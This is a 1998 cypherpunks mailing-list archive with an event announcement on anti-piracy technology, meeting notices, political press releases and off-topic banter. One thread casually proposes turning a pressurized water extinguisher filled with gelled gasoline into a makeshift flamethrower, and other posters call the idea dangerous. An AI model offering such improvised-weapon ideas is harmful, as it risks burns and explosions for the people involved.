From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Burning the Jolly Roger; Internet Anti-Piracy Technology
Cc: Peter F Cassidy <pcassidy@world.std.com>, Dan Geer <geer@world.std.com>,
        Terry Symula <symula@ma.ultranet.com>, "Heffan, Ira" <HEFFAN@tht.com>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----


             The Digital Commerce Society of Boston

                          Presents

                       Peter Cassidy
                          Founder,
                     TriArche Research

                  Burning the Jolly Roger:
         Can Anti-Piracy Technologies Make the Internet
            a Shrinkage-Free Commercial Platform?

                    Tuesday, October 6, 1998
                           12 - 2 PM
              The Downtown Harvard Club of Boston
                One Federal Street, Boston, MA




For most of this century, the fusion of intellectual property and media
was enough to ensure that its owners could reasonably be expected to
profit from its consumption.  Most people didn't have the means to lift
Ella Fitzgerald's music from her records, so fans of her music would
actually have to go out and buy her records.  Today, a high proportion of
ordinary households have the technical capacity at hand to take
recordings, visual or audio artifacts and executables, digitize them if
need be, and transmit it to millions of people overnight over the
Internet.  This state of affairs could signal the demise of the software
and entertainment industries.  Evolving almost as quickly as the
interlopers' sophistication in aquiring and distributing ill-gained wares,
however, are technical solutions to foil pirates, technologies of varying
potency and adaptability.

	Standard specifications for license management systems that
prevent unauthorized use of software have been drafted by the X/Open Group
this summer; watermarking systems and digital wrappers that allow
creatives to either mark or encapsulate images and sounds to frustrate
infringers have been on the market for the past few years; comprehensive
smart wrapper systems like InterTrust and C-dilla promise persistent
protection for all digital artifacts; and at least one system TriArche
Research Group has reviewed under NDA can prevent the most all
non-photographic copying of content presented in a Web browser.
Meanwhile, policing technologies like Online Monitoring Service's
WebSentry can locate pirated intellectual property on the Web and in
Usenet news groups.  None of these technologies are perfect but, as they
mature, they will make it far more difficult for infringers to take
control of intellectual property and to share it with their
contemporaries.  The Web might never lower its shrinkage rate to that of,
say, Wal-Mart but merchants in this medium already have many of the tools
they need to clean up this digital Barbary Coast.

Peter Cassidy is an IT industry writer and analyst at large:  Mr. Cassidy,
director of research at his own firm, TriArche Research Group, has engaged
consulting clients in North America and the Middle East.  As well, Mr.
Cassidy contracts as an information technology analyst with other
industrial research firms, researching topics as varied as network
security, multimedia applications and international telephony markets,
among them, Strategy Analytics, Giga Information Group, Decision
Resources, Dataquest, Business Research Group, The American Institute for
Business Research and CI-InfoCorp.  Mr. Cassidy writes under his own name
for international business publications and general readership magazines
such as  WIRED, Covert Action Quarterly, InformationWeek, CIO Magazine,
The Economist, Forbes ASAP, Software Developer & Publisher Magazine,
Silicon Strategies, The Texas Observer, The Progressive, Telepath
Magazine, American Banker, Datamation, Computerworld, World Trade
Magazine, and the National Security Institute Advisory.  Mr. Cassidy has
been interviewed about technology issues on several broadcast radio
programs in the United States and, appropriately enough, on C|Net Radio,
an international Internet-based audio network. His reportage on national
political affairs has been reprinted in college text books and
anthologies. He has also contracted as a consultant to syndicated
television magazine programs in the United States and Britain.


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, October 6, 1998, from 12pm - 2pm at the Downtown Branch of
the Harvard Club of Boston, on One Federal Street. The price for lunch
is $32.50. This price includes lunch, room rental, various A/V hardware,
and the speaker's lunch. ;-).  The Harvard Club *does* have dress code:
jackets and ties for men (and no sneakers or jeans), and "appropriate
business attire" (whatever that means), for women.  Fair warning: since
we purchase these luncheons in advance, we will be unable to refund the
price of your lunch if the Club finds you in violation of the dress
code.


We need to receive a company check, or money order, (or, if we
*really* know you, a personal check) payable to "The Harvard Club of
Boston", by Saturday, October 3rd, or you won't be on the list for
lunch.  Checks payable to anyone else but The Harvard Club of Boston
will have to be sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The
Harvard Club of Boston", in the amount of $32.50. Please include your
e-mail address, so that we can send you a confirmation

If anyone has questions, or has a problem with these arrangements
(We've had to work with glacial A/P departments more than once, for
instance), please let us know via e-mail, and we'll see if we can work
something out.


Upcoming speakers for DCSB are:

November   Dan Geer       TBA
December   Joseph DeFeo   TBA
January    Ira Heffan     Internet Software and Business Process Patents

We are actively searching for future speakers.  If you are in Boston
on the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, <mailto: rah@shipwright.com>.


For more information about the Digital Commerce Society of Boston,
send "info dcsb" in the body of a message to <mailto:
majordomo@ai.mit.edu> . If you want to subscribe to the DCSB e-mail
list, send "subscribe dcsb" in the body of a message to <mailto:
majordomo@ai.mit.edu> .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNfgqqMUCGwxmWcHhAQELWwf8C0H1jxf2cLeqWywTNKRiPFRMQJ3NnsMN
yOlsISeec05pXO1wUfxjNDQhLZcjJ98Ca73FdDroVFzjJdd4D+fInLCfGSAw9EtC
saCkTZiz0JVGYoM7SsAvwrfhNAy+lqoV4/eWtOlAUDa204oDlsgQPDTUyLvmzv8Q
VJKWpCHyPGBKlVHPNdyWoCOT6e+VS0gZDjsh4s1yIYBVREvGONedDVRC6wSanYEr
/+XdEZhh+FMbxdMoHPoYcvd8vDw/jrTuc9ZRF+R1uBzRVNoK/MDelsnse+qC872o
F7T6Sm76U3VeAGiIB1ElcTG+qXaiv3H3lGPIBj3a9WeDXU6H2TijhQ==
=Pj5e
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 10 Sep 1998 15:54:58 +0800
To: Michael Motyka <mmotyka@lsil.com>
Subject: Re: Happy Fourth of July ( was : Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd))
In-Reply-To: <35F83878.62D5@lsil.com>
Message-ID: <199809102054.QAA26964@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <35F83878.62D5@lsil.com>, on 09/10/98 
   at 01:37 PM, Michael Motyka <mmotyka@lsil.com> said:

>Don't you think this conversation should be continued on some AOL forum? 

You mean this *isn't* an AOL forum!?!

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: For a good time, call 1-800-3IBMOS2

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfg+go9Co1n+aLhhAQF24wP/bYFcSg3fUVtiQ2X4EQ6jYCZkTXpnAJb7
oHfyxvrDfYMjjGHs0H8yMQOyVF5XMarBtO9gLE/QAFUm0gIIzv6bi9shvVy+WjI4
hSqCdVewtTi1X7luW/njHEpg3VbnP9TiLthmG/lKZskIfRPDD1vqMi5PNH2OG/8e
PCtephoQxmo=
=wbUW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 10 Sep 1998 18:08:12 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Happy Fourth
In-Reply-To: <v0311070eb21dc3620425@[206.189.103.244]>
Message-ID: <35F85C94.6A55@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm -almost- ready to admit defeat and move on.

> Did you see the part where I mention that I am (a) an ex-marine,
IMHO Marines burn just like the rest of us wimps. They just don't scream
as much.

> You ever seen 3000 gallons of jet fuel burn,
AOED the biggest fire I've seen was the fire here in CA last month. 6-8
Million tires. Nobody had the balls to put that one out. At peak 1000X
your jet fuel deal. Scary. Very.

> 5 gals. of burning gasoline is NOT a problem. 
ISASI ( it sure as shit is ) if you're wearing it on your back. 

> 5 Gals. cooking off in a sealed container IS a problem.
FYI 5 ounces mixed with compressed air in a metal container could easily
be fatal.

> Fuck you.
Yes, yes, PTMYT ( pleased to meet you too ).

Remember, shit draws flies. There'll just be more geniuses asking how to
make noncryptographic devices. I would enjoy some crypto-tech talk.
Found any cool primitive polynomials lately? Got a good block cipher
with a 4096 bit block size and an even bigger key space? Got some time
to donate to actually put together some good HW/SW systems?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Sep 1998 15:39:36 +0800
To: cypherpunks@cyberpass.net
Subject: Re: oil, greens, recycling, and poly-ticks.
In-Reply-To: <199809101948.PAA09931@panix7.panix.com>
Message-ID: <199809102039.QAA06951@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray's a much too delicate a cpunk to report what going on
with low-flow toilets in NYC. Most of us close the lid, kick
the lever fleeing the stench, which jiggles the muck a bit, 
leaves it for the next hold-breath lid lifter, who figures that's 
what Guiliani has ordered the lifestyle cops.

Trainspotting-type diving for the good stuff is the practice
in Manhattan's best clubs, where Brut reigns, and Carl's 
seasonings show the way to theme prison food franchising, 
emulating the CEO who Julia Childed the airline food cart.

Let me tell later about The Harvard Club of NY's kitchen inability
to pass a health inspection since the Depression. Having surveyed
it recently DN and me toyed with the DCSNY's lunch there, other 
swell-suited cpunks wolfed it like CJ had pronounced it A-OK.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 10 Sep 1998 17:03:01 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Renewable Energy Stuff (was citizenship silliness) (fwd)
In-Reply-To: <199809102014.PAA06141@einstein.ssz.com>
Message-ID: <v0311070cb21df978b810@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:14 PM -0500 9/10/98, Jim Choate wrote:
>Forwarded message:
>> I think you misunderstood.  They are claiming "gasoline equivalent
>> gallons/acre" -- not that 1 gallon of hemp oil = 3 gallons of gasoline.
>> And were not talking about "burning" hemp in that sense.  In this
>> particular case were talking about hemp-based biodiesel.
>
>How many gallons of gasoline can you raise on an acre?
>Actualy the point I was trying to make is that it's comparing apples and
>oranges. Until it's in a dollars/gallon for each of them format no real
>worthwhile comparison can be made.

	No, the point is can enough be raised in this country to meet the
needs of the transportation industry in the near and mid term (anything
longer than 10 to 15 years out couldn't be predicted with accuracy anyway).

>> Raising a full acre of hemp in that matter is something I don't have the
>> data on.  However, hemp is widely known as a low-maintenance crop -- that
>> translates little to no fertilizer.  After that we have the price of the
>> land/month, servicing loans on the farm equipment, labor costs, taxes,
>> energy, water etc.  Typical business overhead.   And for that 1000 galgas
>> eq/acre.
>
>Well don't forget crop rotation since the hemp is going to deplete the soil
>if you simply grow three crops a year (which is possible this far south).
>There is also the issue of water, hemp is a plant that needs lots of water
>and is very sensitive to light levels/times, tempearture and pH. Hemp also
>leeches nitrogen quite heavily.

	Nitrogen is easy to replace, as long as you don't mind a few
tagants in the soil, and don't buy your diesel at the same place...

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 10 Sep 1998 17:03:09 +0800
To: cypherpunks@einstein.ssz.com>
Subject: Re: Happy Fourth of July ( was : Re: Citizenship silliness.  Re:e$: crypto-expatriatism (fwd))
In-Reply-To: <v0311070eb21dc3620425@[206.189.103.244]>
Message-ID: <v0311070db21dfa3ce5ee@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:37 PM -0500 9/10/98, Michael Motyka wrote:
>Happy Fourth of July! and how did this thread start?
>Petro wrote:
>>         I'd also suggest using a water extinguisher, the kind you can
>> refill/recharge yourself. There are some out there, the big silver kind
>> where you can unscrew the top and fill with your liquid of choice, then
>> presurize with  a tire pump. As an aside, one _could_ fill these with a
>> combination of gasoline and a gelling agent to make a short range flame
>> thrower, not that that would be a smart or safe thing to do (really, there
>> wouldn't be much to keep the flame from wandering back up inside the
>> cylinder, and haveing it explode in your hands would make it very hard to
>> type...).
>Actually these things are usually inverted so that the liquid is fed out
>from the bottom so the hose probably won't act like a fuse. At least

	Some are, some aren't. depends on the age.

>until the liquid runs out and there is a combustible pathway into the
>container. If you try this one could you get someone to videotape it
>from a safe distance? It would make a great AVI for an 'anarchists on
>the web' site.

	Ummm, I live in the middle of Chicago, I don't think it's going to
be anytime soon.

>At least mention nitrogen or helium.

	Yeah, but it's harder to get than Air, which can be done with a
bicycle pump.

>But COMPRESSED_AIR + GASOLINE?
>Are you one nut short of a matched pair?
>Gasoline scares the hell out of me. It should you.

	Did you see the part where I mention that I am (a) an ex-marine,
and that (b) whilst in the Marine Corpse I was in Aircraft Firefighting and
Rescue? You ever seen 3000 gallons of jet fuel burn, and it was your job to
get up close and personal with a fire hose.

	5 gals. of burning gasoline is NOT a problem. 5 Gals. cooking off
in a sealed container IS a problem.

>You don't live anywhere near me do you?

	You live in S.F. right?

>You should try baking bread instead.

	Boring.

>Don't you think this conversation should be continued on some AOL forum?

	Fuck you.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 10 Sep 1998 19:06:38 +0800
To: coderpunks@toad.com
Subject: ANNOUNCE: Bay Area Cypherpunks, Sat. Sept. 12, 12-6, KPMG Mountain View
Message-ID: <3.0.5.32.19980910170625.00cd8ec0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



The Septembre Bay Area Cypherpunks Meeting will be Saturday from 12-6,
at KPMG, 500 E. Middlefield Rd., Mountain View, with the organized part
beginning at 1:00.

IPSEC - Hugh Daniel will talk about the latest IPSEC Free/SWAN work
Crypto 98 - Various people will talk about what they saw at the conference.

Dinner after the meeting will be at some restaurant on Castro St. Mtn.View.

Directions: KPMG is a relatively-unmarked building at the corner of
Middlefield Rd. and Ellis St. in Mountain View, surrounded by Netscape.
The lobby entrance is on the Ellis St. side.  
The Ellis exit on 101 is between 85 and 237.

http://www.mapblast.com/mapblast/blast.hm?CMD=MAP&GC=X%3A-122.05265%7CY%3A37.39603%7CLT%3A37.39603%7CLN%3A-122.05265%7CLS%3A20000%7Cc%3AMountain_View%7Cs%3ACA%7Cz%3A94043%7Cd%3A807%7Cp%3AUSA&LV=3&IC=37.39603%3A37.39603&IC=5&IC%3A=KPMG&GAD2=500+E+Middlefield+Rd&GAD3=Mountain+View%2C+CA++94043-4008&W=600&H=350&MA=1&zoom.x=28&zoom.y=172

Probable speaker for October - Sue Bardakos from Entrust

-----------
Mailing list administrivia - this announcement has been sent to
	cypherpunks@algebra.com
	cypherpunks-announce@toad.com
	coderpunks@toad.com
	cryptography@c2.net
If you want to get off one of the lists, send mail to
	listname-request@machine.domain   (probably majordomo!)
for the listserver that sent you the mail.
-----------

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 12 Sep 1998 12:41:05 +0800
To: David Honig <honig@sprynet.com>
Subject: Re: U.S. House only has a T-1
In-Reply-To: <3.0.5.32.19980912091319.007cca60@m7.sprynet.com>
Message-ID: <Pine.BSF.3.91.980910171516.26846A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Sat, 12 Sep 1998, David Honig wrote:

> :: 
> Anon-To: Tim May <tcmay@got.net>, Jim Burnes <jvb@ssds.com>, Declan
> McCullagh <declan@well.com>
> 
> At 12:12 PM 9/11/98 -0700, Tim May wrote:
> >details about Clinton's cigar being inserted into Monica's vagina, about
> >how Clinton talked with Congressional leaders while Monica was giving him a
> >blowjob, and how Clinton suborned perjury and tampered with evidence....
> 
> There's a footnote that mentions oral-anal sex.  Perhaps in DC this
> is a crime?
> 
> 

If kissing an asshole is a crime, they'd have to lock up the whole city.

Besides, where else can you get caught on tape smoking crack with a 
hooker, and still get re-elected mayor?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Thu, 10 Sep 1998 10:38:51 +0800
To: proff@iq.org (Julian Assange)
Subject: Re: cypherpunks archive
In-Reply-To: <19980910100541.10897.qmail@iq.org>
Message-ID: <199809101539.RAA59090@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain



> I'm looking for a/the cypherpunks archive, particularly one that
> covers 92-present. infinity.nus.sg doesn't seem to work anymore.

I don't there is a complete archive on the web at the moment.

http://calvo.teleco.ulpgc.es/listas/cypherpunks@infonex.com
has an archive for 1997 and 1998.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AIMSX@aol.com
Date: Thu, 10 Sep 1998 17:18:07 +0800
To: cypherpunks@toad.com
Subject: Re: Forwarded mail....
Message-ID: <4cb4c748.35f84ccc@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



I truly hope you don't stereotype all AOL users for this idiot's insane
ramblings.
Unfortunately, some people are just morons, but you get them on every ISP
anyway, they just aren't so obvious on others, because unfortunately, AOL
makes it easier to communicate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 10 Sep 1998 20:56:59 +0800
To: cypherpunks@cyberpass.net
Subject: Mercury-News article tries to link crypto export, Africa bombings
Message-ID: <199809110200.TAA22774@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain




Standard four-horsemen stuff; see
<http://www.mercurycenter.com/business/top/066595.htm>. I couldn't find any
actual connection between the Africa bombings and crypto (or crypto
export), but the FBI and their pet congresspeople are much too smart to get
bogged down in a discussion of actual facts. 


--
Greg Broiles        |History teaches that 'Trust us'
gbroiles@netbox.com |is no guarantee of due process.
                    |_Kasler v. Lundgren_, 98 CDOS 1581
                    |(March 4, 1998)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OSCAR <oshako@everest.u-grenoble3.fr>
Date: Thu, 10 Sep 1998 12:15:26 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199809101715.TAA14309@everest.u-grenoble3.fr>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OSCAR <oshako@everest.u-grenoble3.fr>
Date: Thu, 10 Sep 1998 12:15:00 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199809101715.TAA14312@everest.u-grenoble3.fr>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 10 Sep 1998 21:24:08 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: radio net (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284643@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




BTW, is all this talk about rules for specific frequencies dedicated to
amateur radio?

Why not use some of the frequency ranges that were recently opened up
for unlicensed SS/RF use? 

	Matt (who sends encrypted traffic over the airwaves with his
Ricochet modem)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: announce@lp.org (by way of "Edwin E. Smith" <edsmith@IntNet.net>)
Date: Thu, 10 Sep 1998 18:58:09 +0800
To: theforum@lists.execpc.com
Subject: Release: Constitution Museum
Message-ID: <3.0.2.32.19980910195404.00803d30@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

=======================================
NEWS FROM THE LIBERTARIAN PARTY
2600 Virginia Avenue, NW, Suite 100
Washington DC 20037
=======================================
For release: September 9, 1998
=======================================
For additional information:
George Getz, Press Secretary
Phone: (202) 333-0008 Ext. 222
E-Mail: 76214.3676@Compuserve.com
=======================================


Forget ignorant teenagers: Let's send
politicians to the Constitution Museum

        WASHINGTON, DC -- Philadelphia Mayor Ed Rendell's plan to build
a museum dedicated to the Constitution should be approved, the
Libertarian Party says -- provided that every Congressman and Senator
is required to take classes there.

        "Educating ordinary Americans about freedom and individual
rights is important, but educating politicians is absolutely
essential -- because only they have the power to write laws that
threaten your life, liberty, and pursuit of happiness," said Ron
Crickenberger, national director of the Libertarian Party.

        Crickenberger's comments came in response to Rendell's request
to the Senate Appropriations Committee last week for $65 million to pay
half the cost of a museum designed to educate Americans about the
Constitution.

        To buttress his argument that Americans are "ignorant about
government," Rendell cited a survey of 600 teenagers showing that more
of them could name the Three Stooges (59%) than could name the three
branches of government (41%), and that while 74% could name the city
where cartoon character Bart Simpson lives (Springfield), just 12% know
where Abraham Lincoln lived (Springfield).

        Building the museum in Philadelphia, Rendell said, would help
reverse "the tide of ignorance" that is "absolutely critical to the
health of our democracy."

        Crickenberger countered: "First we need to reverse the tide of
ignorance in Congress. After all, in just the last two years, these
politicians have violated the First Amendment by trying to censor the
Internet, flouted the Second Amendment by passing the Lautenberg
gun-control law, and made a mockery of the Fifth Amendment by quietly
creating a massive federal database of every employee in America,
mandating fingerprints for drivers licenses, and imposing a national ID
card.

        "Politicians who habitually violate the Constitution themselves
have no business lecturing ordinary Americans on this subject. Instead,
they should practice what they preach -- and be the first ones in line
when the National Center on the Constitution opens in Philadelphia.

        "And instead of hitting up taxpayers for $65 million, members
of Congress should pay for it out of their own pockets, or by
abolishing some of the unconstitutional agencies they have created,"
Crickenberger said.

        For example, he noted, the Pennsylvania delegation could urge
Congress to come up with the money by:

        * Knocking out every unconstitutional pork-barrel project that
Rep. Bud Shuster quietly inserted into the $217 billion highway bill
that Congress passed in March, such as $800,000 to renovate a historic
train station at Gettysburg and $500,000 for a study on sidewalks at
the Kennedy Center.

        * Trimming the $65 billion corporate welfare budget by
one-tenth of one percent.

        * Earmarking just 25% of the paycheck of every Senator and
Congressional representative -- and every Capitol Hill staffer making
over $100,000 -- for a single session of Congress.

        * Eliminating just one of the hundreds of unconstitutional
federal agencies Congress has created, such as the National Endowment
for the Arts, which has a budget of $100 million a year.

        Then, after attending classes at this museum, members of
Congress should have one other requirement, said Crickenberger.

        "Before graduating from their class on the Constitution, these
politicians should be required to prove their knowledge by repealing
every unconstitutional law they ever passed," he said. "That's the best
way to set an example for American teenagers -- and it doesn't require
building another museum in Philadelphia."


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNfbSuNCSe1KnQG7RAQE8gAQAvrV8hv96Yfkrz7gOvLXEHtu0aY9zxZ1E
wILr9VVw1u2lLig6C/9V8gt1Feio7iCuRvTdG3FI9I9JTvT/Y/QdzLajkNrbHb+V
Oa8YTGgTfVAhpF3MX5M6SHiBua5dsYZtUZ5wLnpTE4oiWSI04hrD612Jf+0CZTCH
JbaOzaW7wnw=
=xN7R
-----END PGP SIGNATURE-----

The Libertarian Party                                      http://www.lp.org/
2600 Virginia Ave. NW, Suite 100                          voice: 202-333-0008
Washington DC 20037                                         fax: 202-333-0072

For subscription changes, please mail to <announce-request@lp.org> with the
word "subscribe" or "unsubscribe" in the subject line -- or use the WWW form.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Brown <dbrown@alaska.net>
Date: Fri, 11 Sep 1998 01:28:25 +0800
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: oil, greens, recycling, and poly-ticks.
In-Reply-To: <199809092123.OAA17355@leroy.fbn.bc.ca>
Message-ID: <3.0.6.32.19980910205225.0096d7d0@alaska.net>
MIME-Version: 1.0
Content-Type: text/plain



Ray Arachelian typethed the following...
>
>Raymond D. Mereniuk wrote:

<snip>

>
>What pisses me off is that in NYC the gas prices are ridiculous high...
>$1.35/Gal is the regular gas, drive just a few miles over a tunnel or bridge 
>to n NJ, it's $1.00 or $.99 depending on which pump you hit...  go a bit
south,
>say VA, and in some areas it drops as low as $0.87 a gallon!
>
>Shit, if it weren't for the tolls and the drive, I'd be getting my gas out of
>NYC all the time, but doing so wastes enough and costs enough in tolls to not
>make it worth the effort...
>
>Just out of curiosity what are prices around where you guys live?

Prices in Anchorage are about $1.15 in the summer and $1.30-5 when the
tourists leave. And we have all the oil you can use and a bunch of
refinery's up here. 
We get shafted nearly as bad as you do.





 --Dave

Lucidity Paradox:  Explain a concept in sufficient detail, and it will
become clearer and clearer until it eventually disappears.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Sep 1998 20:07:45 +0800
To: Alia Johnson <lodi@well.com>
Subject: Springfield Medical Center
In-Reply-To: <Pine.GSO.3.95.980903194936.773B-100000@well.com>
Message-ID: <199809110107.VAA23558@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Alia,

Thanks for the update on CJ. Please keep us informed. More on
CJ's music and how to get it, and help promote it, would be
welcomed. It sounds wonderfully rude and vulgar, all right!

Below is a 1994 thumbnail description of the U.S. Medical Center 
for Federal Prisoners in Springfield, Missouri, taken from a long, 
critical report on prisoner health care with more on the Springfield
facility available at:

   http://jya.com/hehs-94-36.txt (81K)

Bureau of Prisons Health Care: Inmates' Access to Health Care Is Limited
by Lack of Clinical Staff (Letter Report, 02/10/94, GAO/HEHS-94-36).

[Excerpt]

SPRINGFIELD MEDICAL REFERRAL CENTER

   MISSION OF REFERRAL CENTER

The U.S. Medical Center for Federal Prisoners in Springfield,
Missouri, is one of the Bureau of Prisons' six referral centers that
treat male medical, surgical, and mental health patients.

   LOCATION AND CONDITION OF FACILITY

The Springfield Medical Referral Center is an administrative
facility, meaning it is equipped to house inmates of all security
levels.  It was built about 1933.  Inmates live in six connected
buildings, each of two or three stories.  The medical facilities are
concentrated in four of the six buildings.  The acute and chronic
care medical and surgical patients are housed in units that resemble
typical hospital rooms, except that several rooms in each unit have
locked doors.  These locked cells are used for patients who are (1)
dangerous to staff or other inmates, (2) participating in the federal
witness protection program, or (3) waiting for their custody status
to be determined.  The mental health patients are housed in units
that resemble typical prison cell blocks with one-man cells.

Springfield also has a unit that can contain up to 37 inmates in
individual locked cells for disciplinary or protective reasons.

   NUMBER OF INMATES AND PATIENTS SERVED

Springfield serves approximately 1,120 inmates, including 439
patients who require medical or surgical care and 294 who need
psychiatric care.  The medical and surgical care is provided to about
46 acute care patients, 54 patients receiving renal dialysis, and 393
other chronic or recovering patients.  The mental health population
includes 177 treatment patients and 117 forensic inmates who are
being evaluated for their mental ability to stand trial.

   NUMBER AND TYPE OF MEDICAL BEDS

The Joint Commission on Accreditation of Healthcare Organizations
rates Springfield as a 46-bed acute care and 177-bed mental health
hospital.

   NUMBER AND TYPE OF STAFF POSITIONS AUTHORIZED 
   AND FILLED

In July 1993, Springfield had 279 authorized health care positions,
including 5 psychiatrists, 15 medical/surgical physicians, an
optometrist, 12 physician assistants, 127 nurses, 9 pharmacists, 12
psychologists, 6 quality assurance staff, 10 medical records staff,
and 82 other health care staff.  At that time, 18 positions were
vacant, including 3 medical physicians, a surgeon, a psychiatrist, a
physician assistant, 10 nurses, 1 medical records staff, and 1 other
health care staff.  The following specialists were working at
Springfield:  3 general practitioners, 4 psychiatrists, 2 internists, 
2 neurologists, 1 physiatrist, 1 anesthesiologist, 1 orthopedic 
surgeon, and 1 chief of health programs.

Physicians and physician assistants are available 24 hours a day.
However, physicians generally work from 7:30 a.m.  to 4:00 p.m.
During the evening and night shifts and on weekends, one physician,
one psychiatrist, and one psychologist are on call.  Physician
assistants are available in the facility 16 hours a day.  Nurses are
responsible for medical care between 10:00 p.m.  and 6:00 a.m.
Nursing service is provided 24 hours a day.

   STAFF ORGANIZATION

The Associate Warden for Medical Services supervises most of
Springfield's health care staff, including nurses and technicians.
The Clinical Director is responsible for the internal medicine
physicians, psychiatrists, surgeons, dentists, physician assistants,
the quality assurance coordinator, utilization manager, and
infection-control practitioners.  The Associate Warden for Mental
Health Services is responsible for the psychologists and social
workers who work with the mental health patients.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Sep 1998 20:23:19 +0800
To: cypherpunks@cyberpass.net
Subject: Impossible Analysis Paper at Crypto98
Message-ID: <199809110124.VAA25687@dewdrop2.mindspring.com>
MIME-Version: 1.0
